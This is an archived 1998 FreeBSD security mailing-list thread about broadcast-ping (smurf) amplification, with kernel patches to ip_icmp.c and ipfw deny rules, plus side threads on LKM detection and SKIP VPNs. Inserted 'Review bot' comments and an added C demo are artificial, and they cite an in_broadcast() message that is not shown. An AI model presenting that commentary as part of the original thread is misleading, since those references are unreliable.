2.2-980506-SNAP (ip_icmp.c,v 1.22.2.2), but should work equally well
against FreeBSD-current.

Late breaking news: I just checked -current on ftp.cdrom.com, and it
now has the IN_MULTICAST test removed. Still initializes icmpbmcastecho
to 1, though. I think it *should* default to 0 (off).
Steinar Haug, Nethelp consulting, sthaug@nethelp.no ---------------------------------------------------------------------- *** ip_icmp.c.orig Mon Aug 25 18:33:02 1997 --- ip_icmp.c Wed May 27 12:20:55 1998 *************** *** 71,77 **** SYSCTL_INT(_net_inet_icmp, ICMPCTL_MASKREPL, maskrepl, CTLFLAG_RW, &icmpmaskrepl, 0, ""); ! static int icmpbmcastecho = 1; SYSCTL_INT(_net_inet_icmp, OID_AUTO, bmcastecho, CTLFLAG_RW, &icmpbmcastecho, 0, ""); --- 71,77 ---- SYSCTL_INT(_net_inet_icmp, ICMPCTL_MASKREPL, maskrepl, CTLFLAG_RW, &icmpmaskrepl, 0, ""); ! static int icmpbmcastecho = 0; SYSCTL_INT(_net_inet_icmp, OID_AUTO, bmcastecho, CTLFLAG_RW, &icmpbmcastecho, 0, ""); *************** *** 377,384 **** case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcastecho++; break; } --- 377,383 ---- case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } *************** *** 387,394 **** case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcasttstamp++; break; } --- 386,392 ---- case ICMP_TSTAMP: if (!icmpbmcastecho ! 
&& (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcasttstamp++; break; }

From owner-freebsd-security Wed May 27 08:21:24 1998
Date: Wed, 27 May 1998 11:20:37 -0400 (EDT)
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: "J.A. Terranson"
cc: "'FreeBSD Security'"
Subject: Re: Possible DoS opportunity via ping implementation error?

On Tue, 26 May 1998, J.A. Terranson wrote:

> I had a very interesting day today!  I found out that FBSD (2.2.5R)
> machines will always respond to a broadcasted echo request.  For
> example:
>
> W2>ping 10.1.1.255
> PING 10.1.1.255 (10.1.1.255): 56 data bytes
> 64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms
> 64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!)
> lots of these dups...

I've always found this useful, for when I want to build a complete ARP
cache for the local network.  I use it with NeXTStep all the time.

Perhaps the behavior should be modified to respond to broadcast pings
iff they're from a directly connected network, otherwise ignore?

 Ben

"You have your mind on computers, it seems."
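
Review bot: In Steinar Haug's patch to ip_icmp.c above, the hunk at line 71 changes the initializer to "static int icmpbmcastecho = 0;" but the SYSCTL_INT entry next to it still carries an empty description string (""), so nothing tells an administrator what the knob does or that it now defaults to off. Suggest filling in the description and stating the new default in the commit message, since hosts whose operators rely on broadcast ping answers will go quiet after the change.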
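
Review bot: In the ICMP_ECHO hunk (line 377) of Steinar Haug's patch, the drop decision now rests only on (m->m_flags & (M_MCAST | M_BCAST)), that is, on how the frame arrived at link level, and no longer looks at ip->ip_dst at all. The covering message names in_broadcast() as the routine that tests the destination address against the host's broadcast addresses; either add that test next to the flag check or put a comment on the condition saying why the link-level flags are considered sufficient.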
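
Review bot: The ICMP_TSTAMP hunk (line 387) of Steinar Haug's patch repeats the ICMP_ECHO condition and is gated by the same icmpbmcastecho variable, so the bmcastecho sysctl also governs timestamp replies even though the case keeps its own counter, icps_bmcasttstamp. Say so in the sysctl description or in a comment above the case, and consider hoisting the shared test into one helper so the two cases cannot drift apart.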
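
The echo-suppression test from Steinar Haug's message earlier in this thread, modelled in user-space C as an added example; it is not code from the thread or from the FreeBSD tree. The flag values, struct pkt, the 10.1.1.20/24 interface, the sample packets and the dst_is_broadcast() helper are assumptions made for the demo, and the third predicate goes one step beyond the posted patches by testing the destination address, the kind of check the message attributes to in_broadcast().

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Names follow the kernel code quoted in the thread; the numeric flag
 * values, struct pkt and all sample packets are constructed for this demo. */
#define M_BCAST 0x0100
#define M_MCAST 0x0200
#define IN_MULTICAST(a) ((((uint32_t)(a)) & 0xf0000000u) == 0xe0000000u)
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

struct pkt {
    const char *label;
    uint32_t    dst;      /* IP destination, host byte order */
    int         m_flags;  /* link-level receive flags */
};

/* Receiving interface assumed by the demo: 10.1.1.20/24. */
static const uint32_t IF_ADDR = IP4(10, 1, 1, 20);
static const uint32_t IF_MASK = IP4(255, 255, 255, 0);

static const struct pkt samples[] = {
    { "unicast 10.1.1.20",           IP4(10, 1, 1, 20),       0       },
    { "subnet broadcast 10.1.1.255", IP4(10, 1, 1, 255),      M_BCAST },
    { "limited broadcast",           IP4(255, 255, 255, 255), M_BCAST },
    { "multicast 224.0.0.1",         IP4(224, 0, 0, 1),       M_MCAST },
    { "10.1.1.255, no M_BCAST flag", IP4(10, 1, 1, 255),      0       },
};
#define NSAMPLES (sizeof samples / sizeof samples[0])

/* The test as quoted from icmp_input() before the fix: the trailing
 * IN_MULTICAST term means only class D destinations are ever dropped. */
int drop_original(int icmpbmcastecho, const struct pkt *p)
{
    return !icmpbmcastecho
        && (p->m_flags & (M_MCAST | M_BCAST)) != 0
        && IN_MULTICAST(p->dst);
}

/* The test after the patches in the thread: IN_MULTICAST term removed. */
int drop_patched(int icmpbmcastecho, const struct pkt *p)
{
    return !icmpbmcastecho
        && (p->m_flags & (M_MCAST | M_BCAST)) != 0;
}

/* Hypothetical stand-in for an address-based broadcast test: all ones,
 * host part all ones, host part all zeros (one interface only). */
int dst_is_broadcast(uint32_t dst)
{
    uint32_t net = IF_ADDR & IF_MASK;
    return dst == 0xffffffffu
        || dst == (net | (uint32_t)~IF_MASK)
        || dst == net;
}

/* Variant that decides on the destination address instead of the flags. */
int drop_by_address(int icmpbmcastecho, const struct pkt *p)
{
    return !icmpbmcastecho
        && (IN_MULTICAST(p->dst) || dst_is_broadcast(p->dst));
}

typedef int (*drop_fn)(int, const struct pkt *);

/* Number of sample echo requests that would still be answered. */
int replies(drop_fn drop, int icmpbmcastecho)
{
    int n = 0;
    for (size_t i = 0; i < NSAMPLES; i++)
        if (!drop(icmpbmcastecho, &samples[i]))
            n++;
    return n;
}

int main(void)
{
    printf("%-30s %8s %8s %8s\n", "echo request, bmcastecho=0",
           "original", "patched", "by-addr");
    for (size_t i = 0; i < NSAMPLES; i++)
        printf("%-30s %8s %8s %8s\n", samples[i].label,
               drop_original(0, &samples[i]) ? "drop" : "reply",
               drop_patched(0, &samples[i]) ? "drop" : "reply",
               drop_by_address(0, &samples[i]) ? "drop" : "reply");
    return 0;
}
```

With the sysctl at 0, the original predicate still answers both broadcast samples, which matches the behaviour reported in the thread.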

From owner-freebsd-security Wed May 27 08:21:41 1998
To: Bart Smit
cc: "J.A. Terranson", "'FreeBSD Security'"
Subject: Re: SMURF in 2.2.5
From: David Greenman
Date: Wed, 27 May 1998 08:21:23 -0700

>On Wed, 27 May 1998, J.A. Terranson wrote:
>
>> I will not report this to bugtraq until you guys tell me there's
>> a patch...
>
>Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to
>what you'd expect from the advisory...

   That's because the logic for it was broken in the kernel. I just fixed
it yesterday. Diff attached (line numbers in -stable will vary slightly).

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

Index: ip_icmp.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/ip_icmp.c,v retrieving revision 1.29 retrieving revision 1.30 diff -c -r1.29 -r1.30 *** ip_icmp.c 1997/08/25 16:29:27 1.29 --- ip_icmp.c 1998/05/26 11:34:30 1.30 *************** *** 375,382 **** case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 !
&& IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcastecho++; break; } --- 375,381 ---- case ICMP_ECHO: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } *************** *** 385,392 **** case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0 ! && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { icmpstat.icps_bmcasttstamp++; break; } --- 384,390 ---- case ICMP_TSTAMP: if (!icmpbmcastecho ! && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcasttstamp++; break; }

From owner-freebsd-security Wed May 27 08:25:43 1998
To: sthaug@nethelp.no
cc: bag@sinbin.demos.su, andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG
Subject: Re: Possible DoS opportunity via ping implementation error?
From: David Greenman
Date: Wed, 27 May 1998 08:24:56 -0700

>off (no multicast/broadcast echo). The following patch is against
>2.2-980506-SNAP (ip_icmp.c,v 1.22.2.2), but should work equally well
>against FreeBSD-current.
>
>Late breaking news: I just checked -current on ftp.cdrom.com, and it
>now has the IN_MULTICAST test removed. Still initializes icmpbmcastecho
>to 1, though. I think it *should* default to 0 (off).

   I noticed the bug last week when cdrom.com was the target of a smurf
attack. It took a few days to get Garrett's opinion on how to fix it, and
I committed the fix yesterday.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Wed May 27 09:05:24 1998
Date: Wed, 27 May 1998 12:04:51 -0400 (EDT)
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD

[ On Mon, May 25, 1998 at 15:44:39 (-0400), Dave Chapeskie wrote: ]
> Subject: Re: Virus on FreeBSD
>
> On Mon, May 25, 1998 at 11:18:27AM -0400, Greg A. Woods wrote:
> > I meant some way to detect the pattern of code in the *kernel* that is
> > necessary to implement a module loader.
>
> This would be a waste of effort IMHO.  When you build the kernel you
> check what you are compiling in at the source level (as you've done by
> checking what the NO_LKM define actually disables).  If someone else has
> the ability to change or replace the kernel on you (either on disk or in
> memory) then you're already screwed and LKMs are the least of your worries
> :-)

Yeah, I know it's not a really secure thing to do.  It's more a matter
of verifying that the rules and policies have been adhered to than
trying to enforce anything outright.  In this case I'm not expecting
anything truly underhanded to happen, and if it does then I know that
there are other audit trails and countermeasures to deal with them.

Here we have possibly a dozen people who might build their own kernel,
and some of those same people are also authorized to do maintenance work
(such as building new kernels) on production machines.  If any of those
kernels that contain LKM support get from a desktop machine to a
production machine, then I'd like to have some way to detect this.

In other environments where the number of such authorized people may be
at least an order of magnitude larger, then such simple verification
measures can be of real value.  The advantages of being able to give
people responsibilities and the freedom to carry out those
responsibilities, while at the same time not having to manually look over
their shoulders 100% of the time, are great.

On the other hand I don't hold a whole lot of hope that I can easily
implement a tool that will be able to detect code signatures or
patterns, even for a given processor family such as those FreeBSD runs
on.

> In general I find the idea of searching for "code patterns" to be a
> waste of effort.  Like the guy who wrote a perl script that looked for
> code that is designed to crash machines using the pentium 'FOOF' bug.  The
> script looked for the four byte pattern in files... it's real easy to
> build up the required four bytes dynamically and then run them (assuming
> of course that the memory protection mechanism provided by the OS either
> allows executing from the data area or writing to the code area).

I'm not too worried about the truly serious and dedicated cracker here.
There are other countermeasures to stop them, including insurance
coverage and just plain pulling the plug.  We need to have protection
against shooting ourselves in the foot, which coincidentally will also
protect us against the "amateur" crackers and thus keep the insurance
policy valid.

In my experience with real life crackers, and in my analysis of most of
the exploits commonly available, nobody at the amateur level goes to
much trouble to hide their tools (most just download the root kit and
blast away -- they couldn't write even one of the tools in that kit if
they tried).  The professionals (industrial espionage, disgruntled
employees, etc.)
will either try to disguise themselves as amateurs (to give the impression of a lower level of threat), or resort to covert channels and social engineering, from which we have little practical protection, at least through physical and technical controls (this is where people management and insurance policies come in handy again). -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 09:26:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02914 for freebsd-security-outgoing; Wed, 27 May 1998 09:26:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02868 for ; Wed, 27 May 1998 09:26:04 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.0/8.6.10) id JAA05578; Wed, 27 May 1998 09:23:39 -0700 (PDT) Message-Id: <199805271623.JAA05578@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaagela; Wed May 27 09:23:31 1998 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: Bart Smit cc: "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: SMURF in 2.2.5 In-reply-to: Your message of "Wed, 27 May 1998 10:50:05 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 27 May 1998 09:22:50 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > On Wed, 27 May 1998, J.A. Terranson wrote: > > > I will not report this to bugtraq untill you guys tell me there's > > a patch... 
> > Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to > what you'd expect from the advisory... What about ipfw? For example, where 123.123.123.0 is your network address, ipfw add deny icmp from 123.123.123.0 to any ipfw add deny icmp from 123.123.123.255 to any or better yet (which will help stop a fraggle attack), ipfw add deny all from 123.123.123.0 to any ipfw add deny all from 123.123.123.255 to any Any thoughts anyone? > > --Bart > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 11:49:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA00891 for freebsd-security-outgoing; Wed, 27 May 1998 11:49:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA00818 for ; Wed, 27 May 1998 11:49:35 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id KAA00931 for ; Wed, 27 May 1998 10:45:10 -0700 (PDT) Message-Id: <199805271745.KAA00931@dingo.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-reply-to: Your message of "Wed, 27 May 1998 12:04:51 EDT." 
<199805271604.MAA22991@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 27 May 1998 10:45:10 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > Here we have possibly a dozen people who might build their own kernel, > and some of those same people are also authorized to do maintenance work > (such as building new kernels) on production machines. If any of those > kernels that contain LKM support get from a desktop machine to a > production machine, then I'd like to have some way to detect this. In > other environments where the number of such authorized people may be at > least an order of magnitude larger, then such simple verification > measures can be of real value. The advantages of being able to give > people responsibilities and the freedom to carry out those > responsibilties, while at the same time not having to manually look over > their shoulders 100% of the time, are great. > > On the other hand I don't hold a whole lot of hope that I can easily > implement a tool that will be able to detect code signatures or > patterns, even for a given processor family such as those FreeBSD runs > on. Depending on the circumstances, 'options INCLUDE_CONFIG_FILE' may be enough of a requirement for you to be happy. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. 
\\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 11:57:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA02482 for freebsd-security-outgoing; Wed, 27 May 1998 11:57:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA02351 for ; Wed, 27 May 1998 11:56:31 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id OAA11729; Wed, 27 May 1998 14:55:55 -0400 (EDT) Date: Wed, 27 May 1998 14:55:55 -0400 (EDT) From: Mike To: "J.A. Terranson" cc: "'FreeBSD Security'" Subject: Re: Possible DoS opportunity via ping implementation error? In-Reply-To: <01BD88F2.6DDD3A40@w3svcs.mfn.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Tue, 26 May 1998, J.A. Terranson wrote: > I found out that FBSD (2.2.5R) machines will always respond to a > broadcasted echo request. For example: Hmm... Before the advisory and numerous posts here, I thought this was common knowledge. Guess not... My ignorance is probably due to the fact that I have *very* general knowledge on how a SMURF attack actually works (i.e. DoS through massive broadcast replies), but I'm not sure of any details. > W2>ping 10.1.1.255 > PING 10.1.1.255 (10.1.1.255): 56 data bytes > 64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms > 64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!) > lots of these dups... This same type of behavior is exhibited on 2.2.5-R, 2.2.6-R and 3.0-CURRENT boxes here when pinging any broadcast.
Although I never knew it was a 'problem' per se, at least now I know how to fix it (manually for release boxes or with a new cvsup for current)... thanks mostly to the efforts of FreeBSD users (warm, fuzzy feeling ensues). Thanks guys. :) --- Mike Hoskins Email: mike@seidata.com SEI Data Network Services, Inc. WWW: http://www.seidata.com P.O. Box 7, 14005 U.S. 50 (BLD2) Voice: 800.925.6746 ex. 251 Dillsboro, IN 47018 Fax: 812.744.8000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 12:15:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA06385 for freebsd-security-outgoing; Wed, 27 May 1998 12:15:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt050n33.san.rr.com (@dt053nd2.san.rr.com [204.210.34.210]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA06307 for ; Wed, 27 May 1998 12:14:40 -0700 (PDT) (envelope-from Studded@san.rr.com) Received: from san.rr.com (Studded@localhost [127.0.0.1]) by dt050n33.san.rr.com (8.8.8/8.8.8) with ESMTP id MAA13921; Wed, 27 May 1998 12:14:29 -0700 (PDT) (envelope-from Studded@san.rr.com) Message-ID: <356C6614.DAB2BCEE@san.rr.com> Date: Wed, 27 May 1998 12:14:28 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.6-STABLE-0507 i386) MIME-Version: 1.0 To: Janos Mohacsi CC: freebsd-security@FreeBSD.ORG Subject: Re: SRP integration References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Janos Mohacsi wrote: > > Hi! > > Is there anybody doing SRP (Secure Remote Password) integration into the > FreeBSD security system? > If not. How could I join to the team of developers who is maintaining the > security system of FreeBSD? Or should I send just diffs, if I am ready?
The traditional way to submit diffs is to use the send-pr system. A man page is available. If your package is more than 20k or so your PR should contain a description and a pointer to an ftp or www site where the patch can be maintained. Thanks for your interest, Doug -- *** Chief Operations Officer, DALnet IRC network *** *** Proud designer and maintainer of one of the world's largest *** Internet Relay Chat servers with 5,328 simultaneous connections *** Try spider.dal.net on ports 6662-4 (Powered by FreeBSD) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 13:42:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA24760 for freebsd-security-outgoing; Wed, 27 May 1998 13:42:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA24746 for ; Wed, 27 May 1998 13:42:32 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 27047 invoked by uid 1017); 27 May 1998 19:39:44 -0000 Date: Wed, 27 May 1998 13:39:44 -0600 (MDT) From: Atipa To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk OpenBSD just made a vpn command "that makes virtual private networks trivial". I was messing around w/ IPsec and Photurisd and also got really frustrated as well :(. Just FYI. Kevin On Sat, 23 May 1998, Open Systems Networking wrote: > > > Does anyone in this universe have a working SKIP tunnel on FreeBSD > machines? I just spent the last 48 hours with someone trying every > human, chicken, cow voodoo sacrifice possible to get skip going and it > completely fails. 
We got so far that in the LOGS it looks like it works: > > May 23 01:54:59 pinkfloyd skipd: Calculating Shared secret for > bc4d5980738b6378f26be386261cd9d8 > May 23 01:55:00 pinkfloyd skipd: Done > > When i telnet to him the first time it spews that. To me that looks like > everything is configured. before it was speweing CERT=NULL or something > along those lines. We cannot get this thing working. It says the shared > secret has been calculated and when i telnet or ping, then it just hangs > and times out. Anyone have a working tunnel? Anyone have notes on how to > get it working? > > Frustrated in SKIP-Land > > -- > "I don't do favors, I accumulate debts" > > ===================================| Open Systems Networking And Consulting. > FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 > -----------------------------------| 1402 N. Washington, Wellington, KS-67152 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting-Network Engineering-Security > ===================================| http://open-systems.net > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 15:19:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA15018 for
freebsd-security-outgoing; Wed, 27 May 1998 15:19:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14994 for ; Wed, 27 May 1998 15:19:14 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id SAA02893 for ; Wed, 27 May 1998 18:18:53 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id SAA11146 for ; Wed, 27 May 1998 18:18:52 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id SAA27165; Wed, 27 May 1998 18:18:52 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Wed, 27 May 1998 18:18:52 -0400 (EDT) Message-Id: <199805272218.SAA27165@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Mike Smith's message of "Wed, May 27, 1998 10:45:10 -0700" regarding "Re: Virus on FreeBSD " id <199805271745.KAA00931@dingo.cdrom.com> References: <199805271604.MAA22991@brain.zeus.leitch.com> <199805271745.KAA00931@dingo.cdrom.com> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Wed, May 27, 1998 at 10:45:10 (-0700), Mike Smith wrote: ] > Subject: Re: Virus on FreeBSD > > Depending on the circumstances, 'options INCLUDE_CONFIG_FILE' may be > enough of a requirement for you to be happy. This certainly does help a lot, but as with any other option it's kinda hard to mandate it. 
Mandating options is getting easier now though, as we're almost ready to upgrade everything locally to a privately maintained internal version of FreeBSD-stable and people will need very very very good reasons for not using our local source tree. Such an approach has a fair bit of overhead, of course. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 15:34:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA20020 for freebsd-security-outgoing; Wed, 27 May 1998 15:34:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA19863 for ; Wed, 27 May 1998 15:34:14 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id SAA06292; Wed, 27 May 1998 18:33:38 -0400 (EDT) Message-Id: <199805272233.SAA06292@adk.gr> To: Atipa Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Wed, 27 May 1998 13:39:44 MDT." Date: Wed, 27 May 1998 18:33:38 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , Date: 05/27/98, 18:33:37 In message , Atipa writes: > >OpenBSD just made a vpn command "that makes virtual private networks >trivial". I was messing around w/ IPsec and Photurisd and also got really >frustrated as well :(. > >Just FYI. "Trivial" is probably too strong a statement, but it certainly makes them easier. The biggest step is actually the existence of documentation.
I should point out that OpenBSD does *not* use SKIP (nor is it likely to do so in the foreseeable future). - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNWyUwb0pBjh2h1kFAQF6+wP/eLAUPC/6zu3xH0RIOZlBqbbIPqVNC8H8 IpYGIP3mA1eEKqD71/S0my3uzx04VZ2VyLQxj8s6ohjwbVeitFoB+ZNHybhqGOJz oUQ/yugClZ26tFVwzHjjOjNV5W9Nb9OrpCkZMaDs2OqHQ2PiZSsWfEuS7PPgXUoq VxVcZwTvAeE= =U98k -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:04:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA27768 for freebsd-security-outgoing; Wed, 27 May 1998 16:04:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA27686 for ; Wed, 27 May 1998 16:04:16 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 27517 invoked by uid 1017); 27 May 1998 22:01:31 -0000 Date: Wed, 27 May 1998 16:01:31 -0600 (MDT) From: Atipa To: "Angelos D. Keromytis" cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: <199805272233.SAA06292@adk.gr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > >OpenBSD just made a vpn command "that makes virtual private networks > >trivial". I was messing around w/ IPsec and Photurisd and also got really > >frustrated as well :(. > > > >Just FYI. > > "Trivial" is probably too strong a statement, but it certainly makes > them easier. The biggest step is actually the existance of > documentation. I should point out that OpenBSD does *not* use SKIP > (nor is it likely to do so in the foreseeable future). > - -Angelos I agree, but the word "trivial" _was_ used. 
